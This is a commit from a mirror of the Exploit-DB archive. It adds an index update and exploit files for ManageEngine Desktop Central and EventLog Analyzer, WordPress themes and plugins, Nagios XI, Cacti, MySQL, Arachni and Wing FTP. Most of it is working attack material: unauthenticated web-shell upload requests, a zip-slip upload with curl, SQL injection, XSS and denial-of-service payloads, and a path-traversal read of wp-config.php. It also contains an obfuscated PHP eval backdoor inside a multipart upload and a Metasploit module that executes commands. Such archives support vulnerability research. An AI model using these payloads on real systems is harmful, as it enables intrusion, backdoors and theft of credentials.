bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 09_03_2014

Browse source
This commit is contained in:
Offensive Security 2014-09-03 04:43:43 +00:00
parent eb388cdbdd
commit 9eb0b0267d
18 changed files with 679 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
files.csv
View file

@ -31076,3 +31076,20 @@ id,file,description,date,author,platform,type,port
34500,platforms/multiple/remote/34500.html,"Flock Browser 3.0.0 Malformed Bookmark HTML Injection Vulnerability",2010-08-19,Lostmon,multiple,remote,0 34500,platforms/multiple/remote/34500.html,"Flock Browser 3.0.0 Malformed Bookmark HTML Injection Vulnerability",2010-08-19,Lostmon,multiple,remote,0
34501,platforms/php/webapps/34501.txt,"Hitron Soft Answer Me 'answers.php' Cross-Site Scripting Vulnerability",2009-08-10,Moudi,php,webapps,0 34501,platforms/php/webapps/34501.txt,"Hitron Soft Answer Me 'answers.php' Cross-Site Scripting Vulnerability",2009-08-10,Moudi,php,webapps,0
34502,platforms/windows/dos/34502.py,"Serveez 0.1.7 'If-Modified-Since' Header Stack Buffer Overflow Vulnerability",2009-08-09,"lvac lvac",windows,dos,0 34502,platforms/windows/dos/34502.py,"Serveez 0.1.7 'If-Modified-Since' Header Stack Buffer Overflow Vulnerability",2009-08-09,"lvac lvac",windows,dos,0
34503,platforms/php/webapps/34503.txt,"Syntax Highlighter 3.0.83 'index.html' HTML Injection Vulnerability",2010-08-19,indoushka,php,webapps,0
34504,platforms/php/webapps/34504.txt,"Cacti <= 0.8.7 on Red Hat High Performance Computing (HPC) utilities.php filter Parameter XSS",2010-08-19,"Marc Schoenefeld",php,webapps,0
34505,platforms/php/webapps/34505.txt,"MySQL <= 5.1.48 'TEMPORARY InnoDB' Tables Denial Of Service Vulnerability",2010-08-19,"Boris Reisig",php,webapps,0
34506,platforms/linux/dos/34506.txt,"MySQL <= 5.1.48 'EXPLAIN' Denial Of Service Vulnerability",2010-08-20,"Bjorn Munch",linux,dos,0
34507,platforms/linux/remote/34507.txt,"Nagios XI 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",linux,remote,0
34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 'register/next' SQL Injection Vulnerability",2010-08-23,Sweet,php,webapps,0
34510,platforms/linux/dos/34510.txt,"OraclMySQL <= 5.1.48 'LOAD DATA INFILE' Denial Of Service Vulnerability",2010-08-20,"Elena Stepanova",linux,dos,0
34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes (admin-ajax.php, img param) - Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80
34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Stored XSS Vulnerability",2014-09-01,"Prakhar Prasad",multiple,webapps,0
34514,platforms/php/webapps/34514.txt,"WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload Vulnerability",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80
34517,platforms/windows/remote/34517.rb,"Wing FTP Server Authenticated Command Execution",2014-09-01,metasploit,windows,remote,5466
34518,platforms/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / RCE",2014-09-01,"Pedro Ribeiro",jsp,webapps,0
34519,platforms/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",jsp,webapps,8400
34520,platforms/linux/dos/34520.txt,"Oracle MySQL <= 5.1.48 'HANDLER' interface Denial Of Service Vulnerability",2010-08-20,"Matthias Leich",linux,dos,0
34521,platforms/linux/dos/34521.txt,"Oracle MySQL Prior to 5.1.49 Malformed 'BINLOG' Arguments Denial Of Service Vulnerability",2010-08-20,"Shane Bester",linux,dos,0
34522,platforms/linux/dos/34522.txt,"Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability",2010-07-09,"Elena Stepanova",linux,dos,0
34523,platforms/multiple/remote/34523.txt,"Nagios XI 'users.php' SQL Injection Vulnerability",2010-08-24,"Adam Baldwin",multiple,remote,0

Can't render this file because it is too large.

57
platforms/jsp/webapps/34518.txt Executable file
View file

@ -0,0 +1,57 @@
Arbitrary file upload / remote code execution in ManageEngine Desktop Central / Desktop Central MSP
Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Background on the affected product:
"Desktop Central is an integrated desktop & mobile device management
software that helps in managing the servers, laptops, desktops,
smartphones and tablets from a central point. It automates your
regular desktop management routines like installing patches,
distributing software, managing your IT Assets, managing software
licenses, monitoring software usage statistics, managing USB device
usage, taking control of remote desktops, and more."
There are several vulnerable servers are out there if you know the
Google dorks. Quoting the author of the Internet Census 2012: "As a
rule of thumb, if you believe that "nobody would connect that to the
Internet, really nobody", there are at least 1000 people who did."
These vulnerabilities can be abused to achieve remote code execution
as SYSTEM in Windows. I've updated the desktopcentral_file_upload
Metasploit module to use the new statusUpdate technique. Needless to
say, owning a Desktop Central box will give you control of all the
computers and smartphones it manages.
Technical details:
#1
Vulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)
Constraints: none; no authentication or any other information needed
a)
CVE-2014-5005
Affected versions: all versions from v7 to v9 build 90054
Fix: Upgrade to DC v9 build 90055
POST /statusUpdate?actionToCall=LFU&customerId=1337&fileName=../../../../../../shell.jsp&configDataID=1
<... your favourite jsp shell here ...>
b)
CVE-2014-5006
Affected versions: all versions from v8 to v9 build 90054
Fix: Upgrade to DC v9 build 90055
POST /mdm/mdmLogUploader?filename=..\\..\\..\webapps\\DesktopCentral\\shell.jsp
<... your favourite jsp shell here ...>
#2
CVE-2014-5007
Vulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)
Constraints: no authentication needed; need to know valid
computerName, domainName and customerId
Affected versions: all versions from v7 to v9 build 90054
Fix: Upgrade to DC v9 build 90055
Notes: This was previously discovered as CVE-2013-7390 / OSVDB-10008
by Thomas Hibbert, and was "fixed" in 2013-11-09. The fix is
incomplete and it is still possible to upload a shell with a valid
computerName, domainName and customerId.
POST /agentLogUploader?computerName=whatever1&domainName=whatever2&customerId=1337&filename=..\\..\\..\\..\\webapps\\DesktopCentral\\shell.jsp
<... your favourite jsp shell here ...>

155
platforms/jsp/webapps/34519.txt Executable file
View file

@ -0,0 +1,155 @@
Mogwai Security Advisory MSA-2014-01
----------------------------------------------------------------------
Title: ManageEngine EventLog Analyzer Multiple Vulnerabilities
Product: ManageEngine EventLog Analyzer
Affected versions: EventLog Analyzer 9.9 (Build 9002) on Windows/Linux
Impact: critical
Remote: yes
Product link: http://www.manageengine.com/products/eventlog/
Reported: 18/04/2013
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
Vendor's Description of the Software:
----------------------------------------------------------------------
EventLog Analyzer provides the most cost-effective Security Information and
Event Management (SIEM) software on the market. Using this Log Analyzer
software, organizations can automate the entire process of managing terabytes
of machine generated logs by collecting, analyzing, searching, reporting,
and archiving from one central location. This event log analyzer software
helps to mitigate internal threats, conduct log forensics analysis, monitor
privileged users and comply to different compliance regulatory bodies
by intelligently analyzing your logs and instantly generating a variety of
reports like user activity reports, regulatory compliance reports,
historical trend reports, and more.
Business recommendation:
----------------------------------------------------------------------
During a penetration test, multiple vulnerabilities have been identified
that are based on severe design/implementation flaws in the application.
It is highly recommended not to use this software until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.
Vulnerability description:
----------------------------------------------------------------------
1) Unauthenticated remote code execution
ME EventLog Analyzer contains a "agentUpload" servlet which is used by Agents
to send log data as zip files to the central server. Files can be uploaded
without
authentication and are stored/decompressed in the "data" subdirectory.
As the decompress procedure is handling the file names in the ZIP file in a
insecure way it is possible to store files in the web root of server. This can
be used to upload/execute code with the rights of the application server.
2) Authorization issues
The EventLog Analyzer web interface does not check if an authenticated has
sufficient permissions to access certain parts of the application. A low
privileged
user (for example guest) can therefore access critical sections of the web
interface,
by directly calling the corresponding URLs. This can be used to access the
database
browser of the application which gives the attacker full access to the database.
Proof of concept:
----------------------------------------------------------------------
1) Unauthenticated remote code execution
- Create a malicious zip archive with the help of evilarc[1]
evilarc.py -d 2 -o unix -p webapps/event cmdshell.jsp
- Send the malicious archive to the agentUpload servlet
curl -F "payload=@evil.zip" http://172.16.37.131:8400/agentUpload
- Enjoy your shell
http://172.16.37.131:8400/cmdshell.jsp
A working Metasploit module will be released next week.
2) Authorization issues
- Log in as a low privileged user (for example guest/guest)
- Directly call the URL of the database browser
http://xxx.xxx.xxx.xxx:8400/event/runQuery.do
Vulnerable / tested versions:
----------------------------------------------------------------------
EventLog Analyzer 8.2 (Build 8020) (Windows)
EventLog Analyzer 8.2 (Build 8020) (Linux)
EventLog Analyzer 9.0 (Build 9002) (Windows)
EventLog Analyzer 9.0 (Build 9002) (Linux)
Other versions might also be vulnerable.
Disclosure timeline:
----------------------------------------------------------------------
14/04/2013: Vulnerability discovery
18/04/2013: Informed vendor via ManageEngine Security Response Center (MESRC)
Form
23/04/2013: Second try to contact MESRC, as we didn't receive any response from
the first try.
23/04/2013: Response from vendor, they wait on some feedback from the
development team
10/05/2013: Response from vendor, saying that this is rather a issue than a
vulnerability, will fix it anyway
13/05/2013: Technical details including a working proof of concept send
ManageEngine.
13/05/2013: Vendor response, say that they forward it to the development team
24/05/2013: Vendor response, saying that they will fix it in 2013 as they are
"tightly scheduled on other priorities"
24/05/2013: Response from us, asking if we will be informed when the
vulnerability is fixed
28/05/2013: Response from ManageEngine, saying that we must subscribe to their
newsletter for release information
05/09/2013: Verification that exploit is still working with the current version
30/08/2014: Verification that exploit is still working with the current version
31/08/2014: Public release
Solution:
----------------------------------------------------------------------
No known solution
Workaround:
----------------------------------------------------------------------
1) Unauthenticated remote code execution
If agents are not used to collect log information, access to the servlet
can be disabled by commenting out the following lines in the web.xml file
(webapps/event/WEB-INF/web.xml) and restart the service.
agentUpload
com.adventnet.sa.agent.UploadHandlerServlet
agentUpload
/agentUpload
2) Authorization issues
No workaround, reduce the attack surface by disabling unused low privileged
accounts like "guest".
Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/en/lab/advisories/
References
----------------------------------------------------------------------
[1] evilarc
https://github.com/ptoomey3/evilarc
----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)
info@mogwaisecurity.de

24
platforms/linux/dos/34506.txt Executable file
View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/42599/info
MySQL is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to crash the database, denying access to legitimate users.
This issue affects versions prior to MySQL 5.1.49.
NOTE: This issue was previously covered in BID 42594 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been given its own record to better document it.
CREATE TABLE t1 (a VARCHAR(10), FULLTEXT KEY a (a));
INSERT INTO t1 VALUES (1),(2);
CREATE TABLE t2 (b INT);
INSERT INTO t2 VALUES (1),(2);
EXPLAIN SELECT * FROM t1 UNION SELECT * FROM t1
ORDER BY (SELECT a FROM t2 WHERE b = 12);
EXPLAIN SELECT * FROM t2 UNION SELECT * FROM t2
ORDER BY (SELECT * FROM t1 WHERE MATCH(a) AGAINST ('+abc' IN BOOLEAN MODE));
DROP TABLE t1,t2;
exit;

18
platforms/linux/dos/34510.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/42625/info
MySQL is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to crash the database, denying access to legitimate users.
This issue affects versions prior to MySQL 5.1.49.
NOTE: This issue was previously covered in BID 42594 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been given its own record to better document it.
# cat t/tst.test
# The file might exist or not, it does not make any difference.
# --send is important
CREATE TABLE test.t_load (id INT NOT NULL);
--send LOAD DATA LOCAL INFILE 'tb.txt' INTO TABLE test.t_load
#<EOF>

19
platforms/linux/dos/34520.txt Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/42633/info
MySQL is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to crash the database, denying access to legitimate users.
This issue affects versions prior to MySQL 5.1.49.
NOTE: This issue was previously covered in BID 42586 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been assigned its own record to better document it..
--disable_warnings
DROP TABLE IF EXISTS t1;
--enable_warnings
CREATE TABLE t1 ( pk INT , PRIMARY KEY (pk));
HANDLER t1 OPEN AS handler_a;
HANDLER handler_a READ FIRST;
HANDLER handler_a READ `PRIMARY` NEXT;
DROP TABLE t1;

11
platforms/linux/dos/34521.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/42638/info
MySQL is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to crash the database, denying access to legitimate users.
Versions prior to MySQL 5.1.49 are vulnerable.
The following example query is available:
mysql> BINLOG '-2079193929';

11
platforms/linux/dos/34522.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/42643/info
MySQL is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to crash the database, denying access to legitimate users.
Versions prior to MySQL 5.1.49 are vulnerable.
NOTE: This issue was previously disclosed in BID 42586 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been assigned its own record.
thd->query at 0x14bcdf0 = CREATE TEMPORARY TABLE operations ( op VARCHAR(16) ) ENGINE =InnoDB

9
platforms/linux/remote/34507.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42604/info
Nagios XI is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Nagios XI 2009R1.3 are vulnerable.
http://example.com/nagiosxi/login.php?%22;alert%281%29;//

9
platforms/multiple/remote/34523.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42661/info
Nagios XI is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to Nagios XI 2009R1.3 are vulnerable.
http://www.example.com/nagiosxi/admin/users.php?records=int8((select > password from xi_users where username= > CHR(110)||CHR(97)||CHR(103)||CHR(105)||CHR(111)||CHR(115)||CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110)))&sortby=username&sortorder=asc&search=&page=1

28
platforms/multiple/webapps/34513.txt Executable file
View file

@ -0,0 +1,28 @@
Title: Arachni Web Application Scanner Web UI Stored XSS Vulnerability
CVE: 2014-5469
Vendor Homepage: http://www.arachni-scanner.com/
Author: Prakhar Prasad
Author Homepage: https://prakharprasad.com
Reference: https://github.com/Arachni/arachni-ui-web/issues/71
Affected Version: Arachni v0.4.7/WebUI v0.4.4 (possibly in lower versions
too)
Date: August 17th 2014
Tested on: Arachni v0.4.7/WebUI v0.4.4 - Ubuntu 14.04
Details
=======
This is an authenticated Stored XSS, hence the user needs to be logged in
to exploit this issue.
A malicious user (admin/regular) can initiate a website scan in the Arachni
Web UI. After initiating the scan, there is an option of users to comment
onto it (with Markdown formatting). However using Markdown the malicious
user can craft a link that will execute arbitrary Javascript once clicked.
The proof of concept XSS comment: [XSS](javascript:alert('XSS'))
The above comment will roughly translate into: <a
href="javascript:alert('XSS');">XSS</a>. Hence creating an anchor with
user-supplied Javascript content.

9
platforms/php/webapps/34503.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42572/info
Syntax Highlighter is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Syntax Highlighter version 3.0.83 is vulnerable; others may also be affected.
Inject the code ">"">>>><script>location="http://www.alkrsan.net"</script>""""> in index.html

9
platforms/php/webapps/34504.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42575/info
Cacti is prone to cross-site-scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Versions prior to Cacti 0.8.7g are vulnerable.
http://www.example.com/cacti/utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&page=1&action=view_logfile

14
platforms/php/webapps/34505.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/42598/info
MySQL is prone to a denial-of-service vulnerability.
An attacker can exploit these issues to crash the database, denying access to legitimate users.
This issues affect versions prior to MySQL 5.1.49.
NOTE: This issue was previously covered in BID 42598 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been given its own record to better document it.
mysql> SET storage_engine=MYISAM;
mysql> CREATE TEMPORARY TABLE mk_upgrade AS SELECT IF( NULL IS NOT NULL, NULL
, NULL) ; drop table mk_upgrade;

13
platforms/php/webapps/34508.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/42615/info
AneCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example data is available:
username = Sweet'"
password = test
re password = test
email = charif38@hotmail.fr
then register :]

43
platforms/php/webapps/34511.txt Executable file
View file

@ -0,0 +1,43 @@
# WordPress CuckooTap Theme & eShop Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/cuckootap/
# WordPress IncredibleWP Theme Arbitrary File Download
# Vendor Homepage: http://freelancewp.com/wordpress-theme/incredible-wp/
# Google Dork: "Index of" +/wp-content/themes/IncredibleWP/
# WordPress Ultimatum Theme Arbitrary File Download
# Vendor Homepage: http://ultimatumtheme.com/ultimatum-themes/s
# Google Dork: "Index of" +/wp-content/themes/ultimatum
# WordPress Medicate Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
# Google Dork: "Index of" +/wp-content/themes/medicate/
# WordPress Centum Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
# Google Dork: "Index of" +/wp-content/themes/Centum/
# WordPress Avada Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
# Google Dork: "Index of" +/wp-content/themes/Avada/
# WordPress Striking Theme & E-Commerce Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
# Google Dork: "Index of" +/wp-content/themes/striking_r/
# WordPress Beach Apollo Arbitrary File Download
# Vendor Homepage: https://www.authenticthemes.com/theme/apollo/
# Google Dork: "Index of" +/wp-content/themes/beach_apollo/
PoC:
http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

110
platforms/php/webapps/34514.txt Executable file
View file

@ -0,0 +1,110 @@
Summary: WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability.
Found by: Jesus Ramirez Pichardo
@whitexploit
http://whitexploit.blogspot.mx/
Date: 2014-08-28
Vendor Homepage: http://tribulant.com/
Software: Slideshow Gallery
Version: 1.4.6
Software Link: http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip
Tested on: Windows 7 OS, Wordpress 3.9.2 and Chrome Browser.
Description:
I found a serious security vulnerability in the Slideshow Gallery plugin. This bug allows an attacker to upload any php file remotely to the vulnerable website (administrator by default). I have tested and verified that having the current version of the plugin installed in a WordPress installation will allow any registered user (Administrator, Editor, Author, Contributor and Subscriber), to upload a PHP shell to exploit the host system.
Backdoor location: http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php
Today (2014-08-29), I did the notification to vendor and they gave me feedback about the vulnerability by email. The vendor has released a patch a few hours ago. (SlideShow Gallery version 1.4.7 at https://wordpress.org/plugins/slideshow-gallery/changelog).
Proof of Concept (PoC):
1. An attacker uploads a PHP shell file (i.e. backdoor.php):
POST http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow- slides&method=save HTTP/1.1
Host: 192.168.31.128
Connection: keep-alive
Content-Length: 2168
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://192.168.31.128
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEGMugMZ1CVkRzbxV DNT: 1
Referer: http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow- slides&method=save
Accept-Encoding: gzip,deflate
Accept-Language: es-ES,es;q=0.8,en;q=0.6,it;q=0.4,und;q=0.2
Cookie: wordpress_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C9ee160d2851bbcdaa2865 e9010d92d46; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C0565892d6d7 f9de1022e4ad95b45d4ac; wp-settings-1=libraryContent%3Dupload%26editor%3Dtinymce; wp- settings-time-1=1409293045
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[id]"
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[order]"
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[title]"
Test Shell Upload
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[description]"
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[showinfo]"
both
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[iopacity]"
70
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[galleries][]"
1
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[type]"
file
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="image_file"; filename="backdoor.php"
Content-Type: application/octet-stream
<?php
$kvgk = str_replace("y","","ysytyry_yreypylyayce"); $dawj="pdGV4cGxvaXQnO2VzhjaGzh8gJzwnLiRrzhLic+JzzhtldmFsKGJhc2U2NF9kZWNvZGUz"; $asrp="gnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKzhCRhKS0zKSkpKSk7ZWzhNobyAnPC8nLzhiR rLic+Jzt9"; $gxfr="hocHJlZ19yzhZXBsYzhWNlKzhGFycmF5KCcvW15cdz1cc1zh0vJywnzhLzh1xzzhLycpLCBhcnJheSz h"; $fdcd="JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihzhyZXNldCgkYSk9PSd3zhaCcgJiYgJGMzhoJGEpPjMpe zhyRrPSd";
$uuod = $kvgk("j", "", "bjase6j4j_jdjejcjojde");
$qcon = $kvgk("av","","avcraveaavteav_avfavuavnavcavtiavoavn");
$rpgy = $qcon('', $uuod($kvgk("zh", "", $fdcd.$dawj.$gxfr.$asrp))); $rpgy();
?>
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[image_url]"
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[uselink]"
N
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[link]"
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="Slide[linktarget]"
self
------WebKitFormBoundaryEGMugMZ1CVkRzbxV
Content-Disposition: form-data; name="submit"
Save Slide
------WebKitFormBoundaryEGMugMZ1CVkRzbxV--
2. The backdoor is located at http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php
3. The attacker uses a security tool (i.e. weevely) in order to communicate with the backdoor.
#weevely http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php whitexploit
Now the attacker has a “telnet-like console”. Finally, the attacker has the remote control of the
vulnerable website.
Vulnerability Disclosure Timeline:
2014-08-28: Discovered vulnerability
2014-08-29: Vendor Notification (support@tribulant.com)
2014-08-29: Vendor Response/Feedback
2014-08-29: Vendor Fix/Patch
2014-08-30: Public Disclosure

123
platforms/windows/remote/34517.rb Executable file
View file

@ -0,0 +1,123 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Wing FTP Server Authenticated Command Execution',
'Description' => %q{
This module exploits the embedded Lua interpreter in the admin web interface for
versions 4.3.8 and below. When supplying a specially crafted HTTP POST request
an attacker can use os.execute() to execute arbitrary system commands on
the target with SYSTEM privileges.
},
'Author' =>
[
'Nicholas Nam <nick[at]executionflow.org>'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.wftpserver.com' ]
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'Targets' =>
[
[ 'Windows VBS Stager', {} ]
],
'Privileged' => true,
'DisclosureDate' => 'Jun 19 2014',
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(5466),
OptString.new('USERNAME', [true, 'Admin username', '']),
OptString.new('PASSWORD', [true, 'Admin password', ''])
], self.class
)
deregister_options('CMDSTAGER::FLAVOR')
end
def check
res = send_request_cgi(
{
'uri' => '/admin_login.html',
'method' => 'GET'
})
if !res
fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.")
elsif res.code != 200
fail_with(Failure::NotFound, "#{peer} - Admin login page was not found.")
elsif res.body =~ /Wing FTP Server Administrator/ && res.body =~ /2003-2014 <b>wftpserver.com<\/b>/
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
username = datastore['USERNAME']
password = datastore['PASSWORD']
@session_cookie = authenticate(username, password)
print_status("#{peer} - Sending payload")
# Execute the cmdstager, max length of the commands is ~1500
execute_cmdstager(flavor: :vbs, linemax: 1500)
end
def execute_command(cmd, _opts = {})
command = "os.execute('cmd /c #{cmd}')"
res = send_request_cgi(
'uri' => '/admin_lua_script.html',
'method' => 'POST',
'cookie' => @session_cookie,
'vars_post' => { 'command' => command }
)
if res && res.code != 200
fail_with(Failure::Unkown, "#{peer} - Something went wrong.")
end
end
def authenticate(username, password)
print_status("#{peer} - Authenticating")
res = send_request_cgi(
'uri' => '/admin_loginok.html',
'method' => 'POST',
'vars_post' => {
'username' => username,
'password' => password,
'username_val' => username,
'password_val' => password,
'submit_btn' => '+Login+'
}
)
uidadmin = ''
if !res
fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.")
elsif res.code == 200 && res.body =~ /location='main.html\?lang=english';/
res.get_cookies.split(';').each do |cookie|
cookie.split(',').each do |value|
uidadmin = value.split('=')[1] if value.split('=')[0] =~ /UIDADMIN/
end
end
else
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
end
"UIDADMIN=#{uidadmin}"
end
end